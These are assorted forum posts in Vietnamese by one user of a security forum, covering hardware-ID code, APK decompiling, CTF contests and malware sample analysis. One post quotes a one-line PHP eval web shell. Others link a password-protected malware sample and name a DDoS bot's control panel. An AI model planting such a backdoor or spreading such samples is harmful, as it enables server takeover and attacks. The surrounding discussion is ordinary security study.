Messages posted by: sasser01052004

đây là code lấy HWID:

Code:

#define _WIN32_WINNT 0x0400
#include <windows.h>
#include <stdio.h>
#ifdef UNICODE
#define GetCurrentHwProfile GetCurrentHwProfileW
#else
#define GetCurrentHwProfile GetCurrentHwProfileA
#endif
int main()
{
HW_PROFILE_INFO hwProfileInfo;
if(GetCurrentHwProfile(&hwProfileInfo) != NULL){
printf("Hardware GUID: %s\n", hwProfileInfo.szHwProfileGuid);
printf("Hardware Profile: %s\n", hwProfileInfo.szHwProfileName);
}else{
return 0;
}
getchar();
return 0;
}

bạn có thể xem thêm tại đây: http://blog.phuongnam.org/2013/05/lay-hardware-id-bang-c.html

Sau khi lấy được 2 file này, chúng ta cần một số công cụ để dịch ngược file apk thành file java ban đầu. Để làm việc này tôi sử dụng 2 công cụ:

dex2jar : https://code.google.com/p/dex2jar/
jd-gui : http://java.decompiler.free.fr/?q=jdgui

Công cụ (1) giúp chuyển tập tin apk thành định dạng “jar” (Java Archive) một file đóng gói khác của java.

File APK không cần phải chuyển qua JAR đâu bạn ơi

Định dạng của APK vốn là của PKZIP

Nên chỉ cần đổi extension từ APK sang ZIP là được

nhưng filezilla không có các chức năng chuyên nghiệp như FTP cute bạn à, theo mình thì nên sài FTP cute cho lành

Code:

phuongnamsoft@pnam:~$ sudo apt-get install wine1.5
[sudo] password for phuongnamsoft:
E: Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable)
E: Unable to lock the administration directory (/var/lib/dpkg/), is another process using it?
phuongnamsoft@pnam:~$

ai biết cách fix chỉ em với

IT0405 wrote:

panfider wrote:

Mình đang đọc mã nguồn của 4.3BSD gốc. Bất tiện là nó chỉ hỗ trợ cho kiến trúc VAX mà thôi.
Nên mình định tìm hiểu luôn kiến trúc này. Mình định giúp nó hỗ trợ cho x86_32 hoặc lên luôn x86_64
Mình sẽ đặt tên cho BSD của mình là eBSD( nghĩa là enterprise BSD)
Nếu ai có ý định giúp mình thì giúp cho trót.
Nếu muốn tải src nguồn thì lên google gõ "4.3BSD src"

Gió rất là mạnh rồi đó,

Đây có phải là anh Lê Vũ (codenam3) không nhỉ smilie

Cho em hỏi mọi người chút:

Bản chất của một file bất kỳ thật ra là một chuỗi binary dài, nên chúng ta có thể coi chúng là một chuỗi string và có thể lấy mã hash của file.

Nhưng em thấy 1 file có thể rất lớn và chứa nhiều loại kí tự, trong đó thường là kí tự ASCII và có thể còn có Unicode nữa

Trong khi đó 1 hash như md5 thì chứa khoảng 32 đến 40 kí tự 0-9A-F, vậy thì liệu 1 hash có thể là của nhiều file phải không các anh? Tỷ lệ 1 hash 2 hay nhiều file được tính như thế nào?

Anh không áp dụng chính xác và trực tiếp việc cản lọc từng lỗi bảo mật hoặc từng biến thái bảo mật mà anh áp dụng: "denied all, allowed selected".

Anh nói câu này làm em nhớ đến 1 trường hợp mà anh nói ở loạt bài Rookie: "tạo ra 1 chìa khoá có thể mở được nhiều loại khoá"

<html>
<head>
<meta http-equiv="refresh" content="300">
</head>
pong
<body>
</body>
</html>

Đoạn này thì cho em hỏi sao mình lại sử dụng cái này mà không sử dụng session hay cookie để quyết định thời gian live của client.

Thấy cứ 5 phút cái trình duyệt lại xoay xoay làm em chóng mặt quá

P/S: cái trang này bị vỡ khung rồi mấy anh ơi

Đại ca panfider là sinh viên năm mấy vậy ạ, học trường nào để em tới nhận làm sư phụ smilie

Đại ca chém ghê quá, mấy topic trước từ hỏi version của BSD giờ lại đến VAX rồi đọc source của BSD nữa chứ, em chịu đại ca rồi đó

Lỡ có 1 ngày cái tools online đó trở thành offline (bị tắt ngúm) thì sao anh?

Phải kiếm cái nào offline cho dễ dùng chứ ^^

Ai cần IDA pro advanced 6.1 thì pm tớ nhé

http://onlinedisassembler.com/odaweb/run_hex <-- có cái này support multi architecture nè

có tools nào offline mà đc như vậy không huynh gamma95

Chắc em sẽ phải xem lại nhiều thứ hơn nữa (cả về mạng lẫn lập trình)

Em thì chẳng giỏi code tí nào smilie

Nên em sẽ phải cố gắng thêm thật nhiều để tiếp tục trên con đường mà em đam mê

Còn về cái benchmark thì em thấy 1 số sách có ghi:

Java >>>>>> Python >>> C/C++ >>>>>>>>>>>> asm

Em thấy 1 số sách ghi như thế, nếu có gì sai thì mong anh chỉ giáo thêm smilie

Bị timeout chứ có sai đâu anh, pass được 4-5 cái maze là bị timeout

Tại em thấy "cafe" thực thi chậm hơn "trăn", với lại "trăn" dễ viết hơn "cafe"

Em thì học được nhiều điều lắm anh, nhất là sau vòng chung kết

Em nhận ra là hacking phải nắm thật tường tận về code, cái bài GAOmaze bị time out suốt (viết bằng java)

Em nghĩ là nếu viết bằng python thì sẽ cải thiện được tình hình hơn

Anh nghĩ sao?

Anh có đề năm nay thì inbox cho em với smilie

Em đã đăng kí vào snatching the h@t mà chưa biết nó sẽ thi như thế nào nữa smilie

Anh gammar95 có thể cho em vài đề thi của những năm trước không?

Để em tham khảo chút

gaothanhloan wrote:

-Hiện nay có rất nhiều trang web bị hack . Có tất nhiều nguyên nhân nhưng theo tôi nguyên nhân cơ bản là do người lập trình.Khi lập trình một số điểm chú ý của người lập trình như sau:

1. Khi lập trình web phải viết các thủ tục , hàm sql lưu trên Server SQl không được lập trình sql trên code.
2. rewrite url để giúp cho tìm kiếm và đảm bảo an ninh bảo mật.
3. Sử dụng mã nguồn mở lập trình .

Bạn post bài nhảm quá, chẳng hiểu ý bạn là gì
Ý thứ 2 còn hiểu chứ ý thứ 1 và 3 nhảm quá

@TQN ở trong đó có file đó rồi anh

Em thấy putty dính virus, khí vào putty thì nó creat file PUTTYmgr.exe
Anh chị phân tích xem nó làm gì giúp em

http://www.mediafire.com/download.php?jpi8llx1g2eght2

pass là: hva

Thấy nhiều khi em "chân dài" này hoa mắt quăng mấy anh "đẹp trai" vào null

Tớ thấy nên đóng cái box nhảm này và cho nó vào trash

| expantegration | C0denam3 | sasser01052004

xuanphongdocco wrote:

Chỉ với 26 kí tự, thật bá đạo

<?php
@eval($_POST['c']);
?>

Sao không phải là $_GET nhỉ, chỉ còn 25 ki tự ^^

sao nhiều continution thế nhỉ

ừ đúng rồi, đây là 1 con bot SEO_loader

backup and scan backup then reload vps os

Cái đó không phải lạ mà của thằng Yahoo đó bạn

@piloveyou: có thể bạn copy chứa kí tự space trong mật khẩu, bạn thử backspace khi copy xem

@Mask__: tớ đã xem qua file bạn gửi, nhưng cũng chỉ vừa "cưỡi ngữa xem hoa" thôi
Tớ đưa ra vài nhận xét khách quan:
File này import 2 lib động là user32.dll và kernel32.dll
File nàu chứa vài API.

Còn nó hoạt động và đụng chạm cái gì thì tớ xem sau, giờ buồn ngủ quá

chiro8x wrote:

Chẹp ! em vào thì thấy có cái list IP thế, em lấy mấy cái IP thảy lên http://geoiptool.com
Em thấy mấy cái cờ lạ lạ không phải ở Việt Nam.

Mấy bạn chỉ phục vụ cho nhu cầu ở Việt Nam chắc cũng không muốn phục vụ mấy bạn cờ lạ này đâu. Vậy sao mấy bạn không tạm thời chặn request do mấy cái "cờ" lạ này nhỉ ?. Hôm bửa em lên thấy bạn xin list IP của Việt Nam rồi đấy. Anh conmale cũng cho rồi.

Tớ không nghĩ thế, chiro có nghĩ đến trường hợp người dùng sử dụng proxies hay sock nước ngoài để lướt web chưa?

Với lại tớ thấy tinh thần HVA là không chặn 1 cách vô lý (kể cả những nhóm người dùng ít sử dụng) mà chỉ chặn những gói tin mang tính chất bất hợp lệ về tính chất ...

Đó là 1 vài ngu ý của tớ, nếu sai maong các bạn góp ý thêm

Ngoài ra còn bindriff nữa

Bạn vnsec đưa ra hướng đúng đó bạn

Chào Sanvu88,

Tớ đã xem qua con virus bạn gửi và đưa ra vài kết luận:
+ Nó được làm ra để phục vụ mục đích DDoS máy khác, bằng 1 panel chạy web, đây là links panel hosting: http://thuvienmobile.com/panel/

+ Nó lây bằng cách autorun và tự nén vào các file rar hoặc zip
+ Virus filename: